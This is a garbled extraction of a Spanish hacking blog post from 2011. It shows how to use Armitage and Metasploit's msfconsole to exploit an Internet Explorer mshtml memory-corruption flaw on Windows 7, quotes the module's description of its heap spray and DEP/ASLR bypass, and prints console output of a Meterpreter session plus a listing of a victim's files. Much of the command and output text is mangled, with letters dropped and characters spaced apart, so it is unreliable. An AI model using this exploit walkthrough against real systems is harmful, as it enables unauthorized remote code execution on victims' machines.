Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Compartir
Acceder
HackNode
You can hack some stuff too! viernes 28 de enero de 2011 T i e Upda e
El siguiente video muestra como utilizar Armitage para ejecutar cdigo arbitrario en un sistema Windows 7. Esta es la descripcin del mdulo utilizado para el exploit:
This module exploits a memory corruption vulnerability within Microsoft\s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 mscorie.dll module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions.
Seg ido e
1/6
02/03/12
Pa icipa en e e i io
Google F iend Connec
A chi o del blog 2012 (1) 2011 (23) agosto (5) julio (2) junio (2) mayo (1)
Ahora, si queremos realizar el mismo ataque utilizando msfconsole, es muy fcil. En Backtrack 4 R2, nos ubicamos en el directorio framework3 (Metasploit Framework 3: 1 c d/ p e n t e s t / e x p l o i t s / f r a m e w o r k 3
?
marzo (4) febrero (4) enero (5) Encontrada una falla que afecta todas las versione... Uso de Armitage Metasploit para Windows 7 Metasploit Meterpreter Cheat Sheet Reference
2/6
02/03/12
Twitt Metasploit Plugin en Ubuntu Bypass de Windows UAC en Metasploit 2010 (2)
Da o pe
onale Da kOpe a o
Lanzamos el exploit: 1 e x p l o i t
?
f / b f / b f / b f
e/ 1 1 _
" / g eei c 1 2 9 6 2 3 3 6 5 9 . e/ 1 1 _ _ i e _ c _ i
" / \ 3 5 6 \ 2 0 0 \ 2 4 0 \ 3 4 1 \ 2 0
1 \ 2 3 2 \ 3 5 6 \ 2 0 0 \ 2 4 0 \ 3 4 1 \ 2 0 1 \ 2 3 2 \ 3 5 6 \ 2 0 0 \ 2 4 0 \ 3 4 1 \ 2 0 1 \ 2 3 2 \ 3 5 6 \ 2 0 0 \ 2 4 0 \
02/03/12
[ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 9 4S ed ig id C S S [ * ]S ed ig [ * ]M ee [ * ]S e i [ * ]C e a g e( 7 4 9 0 5 6b e) e i 1
/ b
e/ 1 1 _
_ i e _ c _ i
1 9 2 . 1 6 8 . 1 . 1 0 0
ee
ee d( 1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 4 4 4>1 9 2 . 1 6 8 . 1 . c e
1 0 0 : 3 7 0 3 0 )a FiJ a 2 81 7 : 5 4 : 4 3+ 0 1 0 02 0 1 1 I D1( 1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 4 4 4>1 9 2 . 1 6 8 . 1 . 1 0 0 : 3 7 0 3 0 ) R S ci 'i gaef ' e . ee( 3 6 6 8 ) c e . . . e e c e :i e ea d . eeh c e c e : I D2 2 0 4 ea d . ee( 2 2 0 4 ) igIii aA [ * ]Sa iga [ * ]M i gaigi [ * ]N e e e
A partir de ese momento ya se tiene activa la sesin en el equipo vctima, con los mismos permisos que el usuario afectado y por eso la permanente necesidad de utilizar el sistema con permisos restringidos, sobre todo si se trata de un entorno corporativo. fe i( 1 1 _ _ i e _ c _ i )> e i L
A cie e i = = = = = = = = = = = = = = = I d T e - 1 ee ee 7 : 4 4 4 4>1 9 2 . 1 6 8 . 1 . 3 2 : 4 9 1 6 1 If ai C e ci
8 6 /i3 2 ba cb \ Jh @B L A C K B O X 1 9 2 . 1 6 8 . 1 . 1
fe
i( 1 1 _
_ i e _ c _ i
)> e i
Ya podremos utilizar la sesin establecida en el equipo vctima, por ejemplo para realizar un listado de archivos:
4/6
02/03/12
ee
ee >
L i ig :C : \ Ue \ Jh\ Dc e = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Md e 4 0 5 5 5 /- - 4 0 7 7 7 / 4 0 7 7 7 / i c 4 0 7 7 7 / i c i d e 1 0 0 6 6 6 / - - - 4 0 2 . ii f i M J a 1 70 1 : 5 9 : 5 40 5 0 02 0 1 1 d e e 0 d i M J a 1 70 1 : 5 8 : 3 90 5 0 02 0 1 1 M V 4 0 7 7 7 / 0 d i M J a 1 70 1 : 5 8 : 3 90 5 0 02 0 1 1 M P S ie T e L a 0 0 0 d i d i d i M M M d i f i e d N ae -
- - -
J a 1 70 1 : 5 9 : 5 40 5 0 02 0 1 1 . J a 1 70 1 : 5 9 : 5 40 5 0 02 0 1 1 . . J a 1 70 1 : 5 8 : 3 90 5 0 02 0 1 1 M M
Es necesario tener en cuenta que la mayora de los antivirus ya detectan el exploit utilizado por Metasploit (el original) por lo que si la vctima ingresa a la URL con el antivirus habilitado es posible que este detecte el ataque. Publicado por DarkOperator en 22:14
1 pe ona ha
Entrada ms reciente
Pgina principal
Entrada antigua
5/6
02/03/12
6/6